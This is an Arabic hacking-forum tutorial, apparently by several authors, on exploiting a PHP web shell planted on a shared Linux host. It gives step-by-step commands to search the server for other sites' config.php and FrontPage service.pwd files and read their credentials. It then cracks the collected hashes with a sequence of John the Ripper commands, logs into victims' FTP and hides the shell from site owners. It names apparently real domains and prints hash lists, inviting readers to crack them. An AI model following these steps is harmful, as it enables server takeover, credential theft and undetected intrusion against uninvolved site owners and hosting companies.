>بسم الله الرحمن الرحيم

>

>طبعا الكل كان بينتظر هذا الدرس بفارغ الصبر لقلة الدروس المشروحة فى هذا المجال

>واسف على التاخير الى كان سببه انى اكون درس كامل وشامل فى هذا المجال الواسع

>وانشاء الله ربنا يوفقنى فيه

>نبداء درسنا طبعا الكل بيسمع عن phpshell لاكن مين بيعرفه جيدا او استخدمه من قبل

>طبعا المبتدئين ما بيعرفو حتى معناه او ميزته.

>الاختراق عن طريق phpshell بيعتمد فى الاساس على اختراقك لموقع اى موقع على النت

>وبعدين تحمل عليه phpshell وتبدا فى عملية السيطرة على السرفر كله اى الشركة

>المستضيفة للموقع كل المواقع المستضافة عليها بتكون ملكك اذا احسنت استخدام

>phpshell وفى الدرس هنعلمك اذاى تسفيد من الشيل الى اقصى درجة ممكنة.

>انا مش هتكلم عن رفعك phpshell الحين لاكنى هتكلم عنك كانك رفعته لانى محضر ليكم هدية

>فى موضوع الرفع المهم انت الحين اخترقت موقع عن طريق مثلا صغرة فرونت بيج ودخلت على ftp

>وحملت الشل وما تخاف من التحميل ده مجرد فولدر بتحمله على الموقع ونمبداء فى استخدام الشل

>عن طريق المتصفح وبيكون فيه سطر اوامر مثل الليونكس تمام ونفس اوامر الليونكس هى اوامر

>phpshell علشان كدانا بنصحك بعد قرائة الدرس البحث عن اوامر الليونكس كده تمام احنا على الشل

>تعمل ايه انت الان ليس من صلاحياتك انك تعدل فى اى شىء لاكنك مسموح لك بقرائة مجموعة كبيرة جدا من ملفات السرفر

>وديه ميزة كبيرة جدا لازم نستغلها طيب انا اعرف كلمات السر منين ؟

>طبعا كل الشركات المستضيفة بتحاول توفر افضل الخدمات للمواقع المستضافة ذى دعم الفرونت بيج

>وده بيكون لعبتنا وما تنسى الشيل ما بعمل الاعلى سرفرات اليونكس الليونكس وفى الحالة العادية مش الساف مود

>بعض اوامر الشيل

>

>-----------------------------------------------------

>A

>access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..

>at : لتنفيذ امر في تاريخ ووقت معين

>alarm : لعمل منبه

>accept : لقبول اتصال على سوكيت .

>

>

>B

>batch : لتنفيذ امر عندما يحصل على تصريح

>buildhash : مدقق املائي

>

>

>C

>cat : لعرض محتوى اكثر من ملف مع بعض

>cd : لتغير الدليل الذي انت عليه

>chmod : لتغير تصريح دخلول ملف معين

>chown : لتغير مالك ملف معين

>clear : لمسح كل الذي على الشاشة

>cmp : لمقارنة ملفين

>cp : لنسخ الملفات

>crypt : لتشفير و فك تشفير الملفات

>csplit : لتقسيم الملف الى عدة ملفات

>cu : لطلب تريمنال يونكس اخر

>

>

>D

>date : لاظهار التاريخ و الساعة

>df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )

>diff : لمقارنه ملفين

>diff3 : لمقارنه 3 ملفات او اكثر

>dircmp : لمقارنه دليلان

>du : تقرير عن مساحه القرض المستخدم

>

>

>E

>echo : يستخدم لاظهار سطر نكتب فيه تيكست

>text editor : ed ( مثل الورد يعني )

>egrep : مثل الامر grep

>text editor : ex ( مثل الورد يعني )

>

>

>F

>file : للتقرير عن نوع ملف

>find : للبحث عن ملفات

>finger : تقرير عن مستخدم

>

>

>G

>++g : كومبيلر لل C++ و C

>gcc : كومبيلر لل C++ و C

>grep : يستخدم للبحث عن شئ داخل ملف

>gzip : لضغط ملفات

>gunzip : لضغط ملفات

>

>

>H

>haltsys : لاغلاق النظام

>head : لاظهار اول 10 اسطر من الملف

>

>

>I

>ispell : مدقق املائي

>

>

>K

>** kill : لانهاء عمليه

>

>

>L

>line : لقراءة ملف سطر معين في ملف

>ln : لعمل لينك ملف معين

>logname : للحصول على اسم الدخول الخاص بك

>lpr : ارسال طلب للطباعه

>lprint : للطباعه بالطابعه المحليه

>lpstat : لتقديم تقرير عن حاله الطباعه

>lpq : لتقديم تقرير عن حاله الطباعه

>ls : لعرض محتويات مجلد

>

>

>M

>mail : لارسال و استقبال ايميلات

>man : للحصول على معلومات عن اي امر

>mkdir : لعمل دليل جديد

>more : لعرض الملفات

>

>

>P

>passwd : لانشاء كملة سر او تغيره

>pr : لطباعه ملف

>ps : العمليات عن العمليات التي تم تشغيلها

>pstat : لعرض حالة النظام

>pwd : لعرض المسار الذي انت فيه الان

>

>

>R

>rm : لمسح ملفات او مجلدات ( خاليه )

>rmdir : لمسح مجلد ( خالي )

>اوامر الشيل منقولة من

>Pharaonics Team

>----------------------------------------

>نبداء بالسهل الاول

>وهو البحث عن كلمات السر لقواعدالبيانات

>لو عاوز تخترق قواعد البيانات وكلمات السر الغير مشفرة اكتب

>find / -name config.php

>

>هيجيلك كل البرامج الى فيها الكونفيج على السرفر بهذا الشكل

>--------------------------------------------------------------------------------

>usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/config.php

>usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/_vti_cnf/config.php

>usr/local/plesk/apache/vhosts/idks.ws/httpdocs/forum/config.php

>usr/local/plesk/apache/vhosts/dudewherestherave.net/httpdocs/phpBB2/config.php

>usr/local/plesk/apache/vhosts/ukraine-today.com/httpdocs/config.php

>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/forum/config.php

>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/mylinks/cache/config.php

>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/newbb/config.php

>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/news/cache/config.php

>usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/system/cache/config.php

>usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/blacktalons/admin/config.php

>usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/forum/config.php

>usr/local/plesk/apache/vhosts/kunjip.net/httpdocs/bbs/config.php

>usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/forum/config.php

>usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php

>--------------------------------------------------------------------------------

>وعلشان تعرف تشوف الى داخل الملف تكتب

>

>cat /usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php

>

>راح يظهرلك مثلا صفحة الكونفيج

>

>وفيها كلمة المرور واليوزر نيم واسم قاعدة البينات

>الى بتخص البرنامج phpBB2 الى كلنا عرفينه (منتدى) الى امتداده على الموقع

>WWW.thirdeye-dod.com/phpBB2

>وتقدر تشبك مع قاعدة البيانات من خلال البرنامج ده

>MySQL-Front (http://www.sstienemann.de/mysqlfron...t_2.5_Setup.exe)

>

>طيب احنا الحين خلصنا من كلمات السر الغير مشفرة ندخل بقى على الجد

>

>وذى ما قلت فى الاعلى كل الشركات بتحاول تقدم افضل دعم للمستخدم ومن هذه الدواعم

>الفرونت بيج وده الى راح يفتح لنا البوابة الكبيرة للسرفر

>انتو طبعا عرفين ان الملف الى بيكون فيه كلمة السر فى الفرونت بيج

>vti_pvt/service.pwd

>انا مش هقولك مكان الملف على السرفر لاكنك عارف بالطبع مكانه على الموقع ليش انا مابريد اقول مكانه على السرفر

>لان كل سرفر له تقسيمة خاصة لنظم الملفات المهم ايه الحل البديل الحل هو انك تكتب امر البحث عن الملف

>find / -name service.pwd

>

>احنا فى الامر الى فات قولنا ابحث فى (/) يعنى فى الجزر الرئيسى عن الملف service.pwd وهتكون النتيجة مثلا

>

>--------------------------------------------------------------------------------

>usr/local/plesk/apache/vhosts/nextstagetheater.com/httpdocs/_vti_pvt/service.pwd

>usr/local/plesk/apache/vhosts/motherlobe.com/httpdocs/_vti_pvt/service.pwd

>usr/local/plesk/apache/vhosts/urbanspacesny.com/httpdocs/_vti_pvt/service.pwd

>usr/local/plesk/apache/vhosts/mysticalgammon.com/httpdocs/_vti_pvt/service.pwd

>usr/local/plesk/apache/vhosts/qfx.us/httpdocs/_vti_pvt/service.pwd

>usr/local/plesk/apache/vhosts/intranet.rpec.net/httpdocs/_vti_pvt/service.pwd

>usr/local/plesk/apache/vhosts/rayonierpamill.com/httpdocs/_vti_pvt/service.pwd

>usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service.pwd

>--------------------------------------------------------------------------------

>طبعا ده عدد قليل جدا من المواقع انت هيظهرلك على الاقل 100 موقع حسب عدد المواقع الى على السرفر

>طيب احنا استفدنا ايه من النواتج للبحث ؟

>

>استفدنا كثير فمثلا انا عرفت ان كلمة السر الخاصة بموقع pamillsite.com

>موجودة على الامتداد ده

>usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service.pwd

>اى انى لو كتبت

>cat /usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service.pwd

>

>راح يعرض لى كلمت السر الخاصة بالموقع شفت ان الموضوع سهل جد وما محتاج اى تعب

>ناتى لفك التشفير

>لا تفك تشفير موقع وتنتظر الناتج ده مش عملى على الاطلاق انت تجمع كل كلمات السر الى على السرفر

>وتضعها فى ملف واحد باسم

>passwd.txt

>وهيكون مثلا شكله

>---------------------

>jthomas9wJhyXfDlEIk

>ifabc:uyFtvzEic6WbU

>joram:dx8064QfE1HfA

>akron:HxcPUY85ni/j2

>hpoe:9B1k8oG5Jp/Uo

>amwab:6vCYtKGUyLO3s

>antsi:A2FDHZxUzq2XM

>hsheini:NI7HeAEGXR1BM

>nskribne:PDBdOXeHxL6lc

>besta:8apscPCSCmLV.

>bibic:k8G2BP0kMWdb2

>bobpr:6UgBiD.w6ybRU

>---------------------

>حيث p9wJhyXfDlEIk

>كلمة السر المشفرة

>jthomas اليوزر نيم

>

>والبرنامج كدا راح يكون اسرع وهتحصل على نتائج فى اقل من خمس ثوانى

>واعتقد ان الاخ joun هيفدكم اتكككم معاه

>

>

>

>

>اهلا بيكم اخوانى

>انا راح اعطيكم مجموعة من الاوامر تمش عليها بالترتيب وراح تفك اكثر من 60 فى المائة فى اقل من دقيقة

>نبداء على بركة الله

>

>--------------------------

>john -single passwd.txt

>john -savemem:3 passwd.txt

>john -digits passwd.txt

>john -i:alpha passwd.txt

>john -i:all passwd.txt

>-------------------------

>اخوانى اهم شىء الترتيب من الاعلى

>بعد اما فكيت كلمة السر الى بتلاقيها فى الملف john.pot

>هتفتحه على النوت باد هيظهرلك الاتى

>----------------------

>GKFr8t.h31s/6:cipell

>39JkE7aN1.W7w:ideia

>w5ArwaUy1rfIM:juntolli

>toh9pFhI1.MsQradotel

>cXbFL4K4ZcIXE:balada29

>SZqqtC/L8lHOM:123456

>8fgJCj3Jab0bE:123456

>SCcoLYxDqIGzc:hendrix

>tTkN3kEGY2kCc:metal

>---------------------

>طبعا ذى انتو ما شيفين السطر نصفين كلمة السر المشفرة

>وكلمة السر بعد الكسر

>المشفرة:GKFr8t.h31s/6

>المكسورة:cipell

>طيب ترجع لملف كلمات السر وتبحث عن كلمة السر المشفرة الى انت فكيتها هذه

>GKFr8t.h31s/6

>وتشوف ايه اليوزر نيم الخاص بيها

>اترككم تكملو مع الاخ Evil-Mster

>

>اهلا اخوانى

>تدخل على ftp الخاص بالموقع وتكتب اليوزر نيم وكلمة السر

>هتقولى فى مواقع لما بكتب اف تى بى واسم الموقع ما بيفتح

>وفى مواقع بدخلنى على الخدمة من غير كلمة سر ولا يوز نيم

>انا اقوله اكيد وده مش مشكلة ممكن نحلها

>اكتب

>ftp://cipell@pamillsite.com

>حيث cipell اليوزر نيم

>وهو راح يسالك عن كلمة المرور وبكدا تدخل على الموقع وتعمل الى انت عاوزه

>هتلاقى ملفات الموقع فى احد الامتدادات الاتية

>------------

>www

>او

>public_html

>او

>httpdocs

>------------

>

>لاكنى انصحكم بان تضع الشيل على الموقع وما تغير شىء فيه ويكون فى مكان مش ظاهر

>يعنى فولدر للصور او اى شىء من هذا حتى ما يلاحظ صاحب الموقع ويغلقه

>وما تستفاد انت اى شىء

>

>

>

>انا كنت تكلمت عن هدية بالاعلى وهى انى سوف اعطيكم مجموعة من كلمات السر المشفرة تجربو فيها

>نصائح الاخ joun والى هيجبلى كلمة سر مفكوكة ليه شيل هدية

>شوفتم السخاء انا ديما اخوكم وفى الخدمة

>بس ما تنسوى ارفاق الايميل الخاص بيكم بكلمة السر المفكوكة

تقبلو التحيه